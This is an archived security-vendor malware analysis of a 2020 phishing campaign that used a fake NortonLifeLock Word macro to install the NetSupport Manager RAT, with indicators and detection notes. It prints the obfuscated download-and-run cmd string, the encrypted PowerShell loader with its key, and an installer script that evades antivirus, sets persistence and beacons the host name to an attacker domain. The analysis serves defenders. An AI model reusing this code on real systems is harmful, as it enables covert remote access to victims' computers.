{
	"id": "b57e24ee-b373-485c-bd0c-3448876f4b57",
	"created_at": "2026-04-06T00:14:42.220538Z",
	"updated_at": "2026-04-10T03:21:54.371449Z",
	"deleted_at": null,
	"sha1_hash": "69d3913c04aae7c6b5d9b9b04c281ec420b50b6c",
	"title": "Cortex XDR™ Detects New Phishing Campaign Installing NetSupport Manager RAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1374288,
	"plain_text": "Cortex XDR™ Detects New Phishing Campaign Installing NetSupport\r\nManager RAT\r\nBy Mike Harbison, Brittany Barbehenn, Bryan Lee\r\nPublished: 2020-02-27 · Archived: 2026-04-05 17:39:21 UTC\r\nExecutive Summary\r\nIn January 2020, the Cortex XDR Managed Threat Hunting team, part of Unit 42,  identified a malicious Microsoft Word\r\ndocument, disguised as a password-protected NortonLifelock document, being used in a phishing campaign to deliver a\r\ncommercially available remote access tool (RAT) called NetSupport Manager. Using a fictitious NortonLifelock\r\ndocument to entice the user to enable macros makes this particular attack interesting to us.\r\nThis RAT is typically used for legitimate purposes allowing administrators remote access to client computers. However,\r\nmalicious operators are installing the RAT to victim’s systems allowing them to gain unauthorized access. The use of this\r\nNetSupport Manager RAT for unauthorized access has been observed in phishing campaigns since at least 2018.\r\nDuring an initial review of the detection, which was flagged via Cortex XDR™, we observed that the causality chain\r\nbegan when a Microsoft Word document was opened from within Microsoft Office Outlook. While we do not have the\r\nactual email, we are able to conclude that this activity appears to be a part of a larger campaign.\r\nThis activity employs evasion techniques to evade both dynamic and static analysis and utilizes the PowerShell\r\nPowerSploit framework to carry out the installation of the malicious file activity. Through additional analysis, we\r\nidentified related activity dating back to early November of 2019.\r\nIn this write-up, we will describe the anomalous activities as observed through Cortex XDR’s behavioral detection\r\ncapabilities.\r\nDelivery\r\nIn early January 2020, the Cortex XDR™ Engine detected a suspicious winword.exe process executing an obfuscated\r\nbatch file. In Figure 1, you can see multiple points of detection beginning with the initiating Microsoft Word process and\r\ncontinuing with the creation and execution of a .bat file. In Figure 2, you can see a rollup of the Timeline view showing\r\nan alert for a known bad indicator, the behavioral process execution, and attempted connection activities. Figure 3 shows\r\nthe initial alert detected based on these behavioral indicators.\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 1 of 13\n\nFigure 1. Cortex XDR™ causality chain\r\nFigure 2. Cortex XDR™ causality chain timeline\r\nFigure 3. Cortex XDR™ BIOC detection\r\nFigure 4 below is a screenshot of the malicious document used, disguised as a password-protected NortonLifelock\r\ndocument which requests the user to enter a password to enable macros. The document used for this analysis is SHA256:\r\nE9440A5D2DFE2453AE5B69A9C096F8D4CF9E059D469C5DE67380D76E02DD6975\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 2 of 13\n\nFigure 4. Delivery document disguised as NortonLifeLock.\r\nTo the user, the document appears to contain personal information that requires a password to view. Once the document\r\nis opened and the user clicks “Enable Content”, the macro is executed and the user is presented with a password dialog\r\nbox.\r\nFigure 5. Password dialog box presented to the user\r\nWe suspect this password is provided in the phishing email, as it accepts only the letters ‘c’ or ‘C’ as shown in the macro\r\ncode below. The hash for this macro code is SHA256:\r\n68ca2458e0db9739258ce9e22aadd2423002b2cc779033d78d6abec1db534ac2\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 3 of 13\n\nIf the user enters an incorrect password, they are presented with an error message stating an incorrect key was entered\r\nfollowed by a “done” processing message. It should be noted that no malicious activity occurs until the correct key is\r\nentered.  \r\nOnce the correct password is received, the macro continues code execution and builds the following command string:\r\ncmD /c EChO|SE^t /p=\" M^siexe\"\u003e%temp%\\alpaca.bat\u0026EcHo|s^et\r\n/p=\"c \" \u003e\u003e%temp%\\alpaca.bat\u0026EcHo|s^et /p=\"^/i\"\r\n\u003e\u003e%temp%\\alpaca.bat\u0026EcHo|s^et /p=\"\r\nhttp^:^/^/^quickwaysignstx[.]com/view.php\r\n\"\u003e\u003e%temp%\\alpaca.bat\u0026EcHo|s^et /p=\" ^/q\r\n\u0026exit\"\u003e\u003e%temp%\\alpaca.bat\u0026%temp%\\alpaca.bat\u0026avvfge 2\r\nThe macro obfuscates all strings using multiple labels on Visual Basic for Applications (VBA) forms, which contain two\r\ncharacters that are eventually linked together to construct the final command to download and execute the RAT on the\r\nvictim.\r\nThe command string is executed via the VBA shell function, which does the following:\r\n1. Launches cmd.exe passing the /c parameter - carries out the command and exits\r\n2. Constructs a batch file named alpaca.bat in the victims %temp% directory\r\n3. Executes the newly created batch script\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 4 of 13\n\nThe batch script uses msiexec, which is a part of the Windows Installer service used to download and install a Microsoft\r\nIntermediate Language (MSIL) binary to the victim from the domain:\r\nquickwaysignstx[.]com/view.php\r\nThe server that is serving view.php appears to be filtering on the user-agent string, as visiting the site with a browser\r\ndisplays a standard image for the webpage. Note this domain appears to be a legitimate domain, which has been\r\ncompromised and is being used by these operators.\r\nFigure 6. HTTP GET request to view.php on quickwaysignstx[.]com\r\nIf the user-agent string in the request is\r\nWindows Installer\r\n, an MSI file is returned. This user-agent string is part of the msiexec command, further supporting that the payload will\r\nonly be downloaded when using msiexec. The MSI payload (SHA256:\r\n41D27D53C5D41003BC9913476A3AFD3961B561B120EE8BFDE327A5F0D22A040A\r\n) was built using an unregistered version from\r\nwww.exemsi[.]com\r\nwith the title of\r\nMPZMZQYVXO patch version 5.1\r\n.\r\nThis version string appears to be random, as several other strings were noted during an analysis of related activities. The\r\nstring is displayed when MSI is run. Once downloaded, the MSI will execute using the /q parameter to suppress any\r\nWindows dialogs from the user. A similar activity was reported in November 2019.\r\nThe MSI installs a PowerShell script in the victim’s %temp% directory named REgistryMPZMZQYVXO.ps1.\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 5 of 13\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\nfunction HYTNKJSDEH([String] $YTVRJKIEIR, [String] $BORBFDSYOP)\r\n{\r\n$DHPFYCOKLM = “\u003c\u003cstrong\u003ebase64 encoded + encrypted payload\u003c/strong\u003e\u003e”;\r\n$encoding = New-Object System.Text.ASCIIEncoding;\r\n$KULVWNXDPId = $encoding.GetBytes(\"DJZGVUGVHDMNIGZD\");\r\n$derivedPass = New-Object\r\nSystem.Security.Cryptography.PasswordDeriveBytes($YTVRJKIEIR,\r\n$encoding.GetBytes($BORBFDSYOP), \"SHA1\", 2);\r\n[Byte[]] $ESFLDIMUEO = $derivedPass.GetBytes(16);\r\n$LCZJFEXHXR = New-Object\r\nSystem.Security.Cryptography.TripleDESCryptoServiceProvider;\r\n$LCZJFEXHXR.Mode =\r\n[System.Security.Cryptography.CipherMode]::CBC;\r\n$JOVGMJCIKY = $LCZJFEXHXR.CreateDecryptor($ESFLDIMUEO, $KULVWNXDPId);\r\n$LBUWDFHHMZ = New-Object System.IO.MemoryStream($DHPFYCOKLMa,\r\n$True);\r\n$ZSKXKODPKK = New-Object\r\nSystem.Security.Cryptography.CryptoStream($LBUWDFHHMZ,\r\n$JOVGMJCIKY,\r\n[System.Security.Cryptography.CryptoStreamMode]::Read);\r\n$STDVLFIUQN = $ZSKXKODPKK.Read($JHTZWEZBUW, 0,\r\n$JHTZWEZBUW.Length);\r\n$LBUWDFHHMZ.Close();\r\n$ZSKXKODPKK.Close();\r\n$LCZJFEXHXR.Clear();\r\nif (($JHTZWEZBUW.Length -gt 3) -and ($JHTZWEZBUW[0] -eq 0xEF)\r\n-and ($JHTZWEZBUW[1] -eq 0xBB) -and ($JHTZWEZBUW[2] -eq 0xBF)) {\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 6 of 13\n\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n$h = $JHTZWEZBUW[3..($JHTZWEZBUW.Length-1)]; }\r\nreturn $encoding.GetString($JHTZWEZBUW).TrimEnd([Char] 0);\r\n}\r\n$TYCNJNUWWG = HYTNKJSDEH \"ew9p5rzlmvcf32b6i0oun8q47tag1xhs\"\r\n\"7ohp9z481qem6ykbdu2argt5lj3fcsi0\";\r\nInvoke-Expression $TYCNJNUWWG;\r\nThe encrypted blob of data stored in REgistryMPZMZQYVXO.ps1 is another PowerShell script that is responsible for\r\ninstalling the NetSupport Manager RAT onto the victim and setting up persistence.\r\nThe PowerShell script appears to have been generated using the open-source script Out-EncryptedScript.ps1 from the\r\nPowerSploit framework. It contains a blob of data that is obfuscated via base64 and is TripleDES encrypted with a cipher\r\nmode of Cipher Block Chain (CBC).\r\nThe decryption password and Initialization Vector (IV) for this particular sample is:\r\nDecryption key = 0xA7A15B277A74CD3233B9DF078ABCDE12\r\nIV                        = DJZGVUGVHDMNIGZD\r\nIt should be noted that the IV used in this sample would most likely be different from other samples generated by\r\nPowerSploit. Also, the 16 byte IV would be truncated to 8 bytes, as IV block sizes are 8 bytes in length. The decrypted\r\nPowerShell script looks like:\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n$scriptPath = split-path -parent\r\n$MyInvocation.MyCommand.Definition\r\nif ($scriptpath -match \"avast\") {exit}\r\nif ($scriptpath -match \"Avast\") {exit}\r\nif ($scriptpath -match \"AVG\") {exit}\r\nif ($scriptpath -match \"avg\") {exit}\r\nfunction react (\r\n  $source,\r\n  $destination\r\n)\r\n{\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 7 of 13\n\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\nConvert-StringToBinary -InputString $source -FilePath $Destination;\r\n  #      }\r\n     }#}\r\nfunction Convert-StringToBinary\r\n(\r\n$InputString\r\n,  $FilePath\r\n)\r\n{\r\n$file= $InputString\r\n$data = [System.Convert]::FromBase64String($file)\r\n$ms = New-Object System.IO.MemoryStream\r\n$ms.Write($data, 0, $data.Length)\r\n$ms.Seek(0,0) | Out-Null\r\n$cs = New-Object System.IO.Compression.GZipStream($ms,\r\n[System.IO.Compression.CompressionMode]::Decompress)\r\n$sr = New-Object System.IO.StreamReader($cs)\r\n$t = $sr.readtoend()#|out-file str.txt\r\n$ByteArray = [System.Convert]::FromBase64String($t);\r\n[System.IO.File]::WriteAllBytes($FilePath, $ByteArray);\r\n}\r\nfunction Install\r\n{\r\n$file1 = “\u003c\u003cstrong\u003eGzip compressed + base64 encoded file\u003c/strong\u003e\u003e”;\r\n$file2 = “\u003c\u003cstrong\u003eGzip compressed + base64 encoded file\u003c/strong\u003e\u003e”;\r\n$file3 = “\u003c\u003cstrong\u003eGzip compressed + base64 encoded file\u003c/strong\u003e\u003e”;\r\n$file4 = “\u003c\u003cstrong\u003eGzip compressed + base64 encoded file\u003c/strong\u003e\u003e”;\r\n$file5 = “\u003c\u003cstrong\u003eGzip compressed + base64 encoded file\u003c/strong\u003e\u003e”;\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 8 of 13\n\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n57\r\n58\r\n59\r\n60\r\n61\r\n62\r\n63\r\n64\r\n65\r\n66\r\n67\r\n$file6 = “\u003c\u003cstrong\u003eGzip compressed + base64 encoded file\u003c/strong\u003e\u003e”;\r\n$file7 = “\u003c\u003cstrong\u003eGzip compressed + base64 encoded file\u003c/strong\u003e\u003e”;\r\n$file8 = “\u003c\u003cstrong\u003eGzip compressed + base64 encoded file\u003c/strong\u003e\u003e”;\r\n$file9 = “\u003c\u003cstrong\u003eGzip compressed + base64 encoded file\u003c/strong\u003e\u003e”;\r\n$file10 = “\u003c\u003cstrong\u003eGzip compressed + base64 encoded file\u003c/strong\u003e\u003e”;\r\n$file11 = “\u003c\u003cstrong\u003eGzip compressed + base64 encoded file\u003c/strong\u003e\u003e”;\r\n$file12 = “\u003c\u003cstrong\u003eGzip compressed + base64 encoded file\u003c/strong\u003e\u003e”;\r\n$randf=( -join ((0x30..0x39) + ( 0x41..0x5A) + ( 0x61..0x7A) |\r\nGet-Random -Count 8 | % {[char]$_}) )\r\n$fpath =\"$env:appdata\\$randf\"\r\nmkdir $fpath\r\n$clientname=\"presentationhost.exe\"\r\n$Source = $file1\r\n$Destination = \"$fpath\\\"+\"$clientname\"\r\nreact -source $source -destination $destination\r\n$Source = $file2\r\n$Destination = \"$fpath\\client32.ini\"\r\nwrite-host $destination\r\nreact -source $source -destination $destination\r\n$Source = $file3\r\n$Destination = \"$fpath\\HTCTL32.DLL\"\r\nreact -source $source -destination $destination\r\n$Source = $file4\r\n$Destination = \"$fpath\\msvcr100.dll\"\r\nreact -source $source -destination $destination\r\n$Source = $file5\r\n$Destination = \"$fpath\\nskbfltr.inf\"\r\nreact -source $source -destination $destination\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 9 of 13\n\n68\r\n69\r\n70\r\n71\r\n72\r\n73\r\n74\r\n75\r\n76\r\n77\r\n78\r\n79\r\n80\r\n81\r\n82\r\n83\r\n84\r\n85\r\n86\r\n87\r\n88\r\n89\r\n90\r\n91\r\n92\r\n93\r\n94\r\n95\r\n$Source = $file6\r\n$Destination = \"$fpath\\NSM.ini\"\r\nreact -source $source -destination $destination\r\n$Source = $file7\r\n$Destination = \"$fpath\\NSM.lic\"\r\nreact -source $source -destination $destination\r\n$Source = $file8\r\n$Destination = \"$fpath\\pcicapi.dll\"\r\nreact -source $source -destination $destination\r\n$Source = $file9\r\n$Destination = \"$fpath\\PCICHEK.DLL\"\r\nreact -source $source -destination $destination\r\n$Source = $file10\r\n$Destination = \"$fpath\\PCICL32.DLL\"\r\nreact -source $source -destination $destination\r\n$Source = $file11\r\n$Destination = \"$fpath\\remcmdstub.exe\"\r\nreact -source $source -destination $destination\r\n$Source = $file12\r\n$Destination = \"$fpath\\TCCTL32.DLL\"\r\nreact -source $source -destination $destination\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v ServiceDLL /t REG_SZ /d\r\n\"$fpath\\$clientname\" /f\r\nstart-process \"$fpath\\$clientname\"\r\n#Start-sleep -s 10\r\nInvoke-WebRequest -Uri \"http://afsasdfa33[.]xyz/iplog/lepo.php?hst=$env:computername\"\r\n$f=get-content $env:temp\\insghha4.txt\r\nremove-item $env:TEMP\\*.ps1\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 10 of 13\n\n96\r\n97\r\n98\r\n99\r\n100\r\n101\r\n102\r\n103\r\n104\r\n105\r\n106\r\n#cmd /c del %temp%\\*.ps1 /f\r\n#cmd /c del %temp%\\*.txt /f\r\nremove-item $f\r\n}\r\n#ShowConsole\r\n#rights\r\ninstall;\r\nThe RAT installer PowerShell script does the following:\r\n1. Halts installation if Avast or AVG Antivirus Software is running on the target\r\n2. Installs 12 files that make up the NetSupport Manager RAT to a random directory (length of eight) in the victims\r\n%appdata% e.g c:\\users\\%username%\\Appdata\\Roaming\\%randomvalue%\\\r\n3. Sets up persistence on the victim by creating the following registry key:\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\r\nName: ServiceDLL\r\nValue: C:\\Users\\%username% \\AppData\\Roaming\\%randomvalue%\\presentationhost.exe'\r\n4. Executes the main NetSupport Manager RAT presentationhost.exe\r\n5. Sleeps for 10 seconds\r\n6. Sends the victim's computer name to http://afsasdfa33[.]xyz/iplog/lepo.php?hst=%computername%\r\n7. Any data returned from site afsasdfa33[.]xyz is saved in the victim’s %temp% directory as file insghha4.txt\r\n8. Removes all files with file extension .ps1 from the victim’s %temp% directory\r\n9. Deletes a file named insghha4.txt\r\nOnce the main NetSupport Manager executable (presentationhost.exe) is started, it beacons to the domain\r\ngeo.netsupportsoftware[.]com to retrieve geolocation of the host followed by an HTTP POST to\r\nhttp://94.158.245[.]182/fakeurl.htm\r\nIt should be noted that the original name of NetSupport Manager is client32.exe and it was likely changed to\r\npresentationhost.exe to avoid any suspicions. Example of traffic sent to the target domain:\r\nPOST http://94.158.245[.]182/fakeurl.htm HTTP/1.1\r\nUser-Agent: NetSupport Manager/1.3\r\nContent-Type: application/x-www-form-urlencoded\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 11 of 13\n\nContent-Length: 22\r\nHost: 94.158.245[.]182\r\nConnection: Keep-Alive\r\nCMD=POLL\r\nINFO=1\r\nACK=1\r\nResponse received:\r\nHTTP/1.1 200 OK\r\nServer: NetSupport Gateway/1.6 (Windows NT)\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 60\r\nConnection: Keep-Alive\r\nEncrypted data sent from the victim\r\nPOST http://94.158.245[.]182/fakeurl.htm HTTP/1.1\r\nUser-Agent: NetSupport Manager/1.3\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 244\r\nHost: 94.158.245[.]182\r\nConnection: Keep-Alive\r\nCMD=ENCD\r\nES=1\r\nDATA=u.2h.r..4.]..%y-.....=I...D3.W..i.7?....=@....F.f....\u0026t.[..6ra..L.. Tzg..... ..U.z4.]..%y-A9H=n .:!.\"Pfd]U,[.\r\n(...f=I.....W.p..RHz.....#..@.....\u003e|.?...R...s.nt.G..=}\\......M...6...wC........ .I=M..0i=@..o.ckp=@.r........M.6..\r\nExtended Campaign Details\r\nWhile hunting for related activity on all XDR customers, we identified other files likely related to this campaign activity.\r\nThis related activity ranges in date from the beginning of November 2019 through the end of January 2020.\r\nThroughout the first half of November, all related activities used email attachments containing the name of an individual\r\npublicly associated with the target company or utilizing the name of a public figure. Most public figures referenced\r\nbelonged in the film or print industry. All emails were also sent using a random protonmail[.]com email address and\r\ncontained email subjects related to refund status or unauthorized credit card transactions. Beginning at the end of\r\nNovember and continuing into January 2020, the mail attachments changed and were instead named as \u003ctarget company\r\nwebsite\u003e.doc and sent from email addresses using domains that were registered within one day of the observed activity.\r\nThe email subjects contained the same trend reusing themes associated with refunds, as well as transaction and order\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 12 of 13\n\ninquiries. While it is unclear what the overall motivations of this activity is, these changes may increase the likelihood of\r\na recipient opening the email attachment and indicate a desire to gain access to the target network.\r\nAll associated indicators are referenced in the Appendix. While these indicators have been observed in malicious activity,\r\nsome may also be used for benign activities as well.\r\nConclusion\r\nCortex XDR™ utilizes signatures built for low detection activity like this by looking for behavioral activity\r\ncombinations that may evade static and dynamic analysis.\r\nMalicious use of the NetSupport Manager remote access tool has also been reported by both FireEye and Zscaler\r\nresearchers. While this activity appears to be broad and at large scale, there are indications, such as the document name,\r\nthat show the actor’s attempt to provide a stronger relationship to the target in an attempt to increase the success rate.\r\nPalo Alto Networks customers are protected from this threat via multiple services. Our threat prevention platform detects\r\nboth the NetSupport Manager file along with the related payloads, including URL retrieval. Cortex XDR customers are\r\nfurther protected by behavioral indicator signatures. AutoFocus users can track related activities using the NetSupport\r\nManager tag.\r\nPalo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our\r\nfellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their\r\ncustomers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit\r\nwww.cyberthreatalliance.org. (This is added to blogs pre-shared with the CTA, when loaded into WordPress it will be\r\nadded when appropriate).\r\nIndicators of Compromise\r\nIndicators associated with this analysis can be found on the Unit 42 GitHub IOCs page here.\r\nSource: https://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nhttps://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/\r\nPage 13 of 13",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://unit42.paloaltonetworks.com/cortex-xdr-detects-netsupport-manager-rat-campaign/"
	],
	"report_names": [
		"cortex-xdr-detects-netsupport-manager-rat-campaign"
	],
	"threat_actors": [],
	"ts_created_at": 1775434482,
	"ts_updated_at": 1775791314,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/69d3913c04aae7c6b5d9b9b04c281ec420b50b6c.pdf",
		"text": "https://archive.orkl.eu/69d3913c04aae7c6b5d9b9b04c281ec420b50b6c.txt",
		"img": "https://archive.orkl.eu/69d3913c04aae7c6b5d9b9b04c281ec420b50b6c.jpg"
	}
}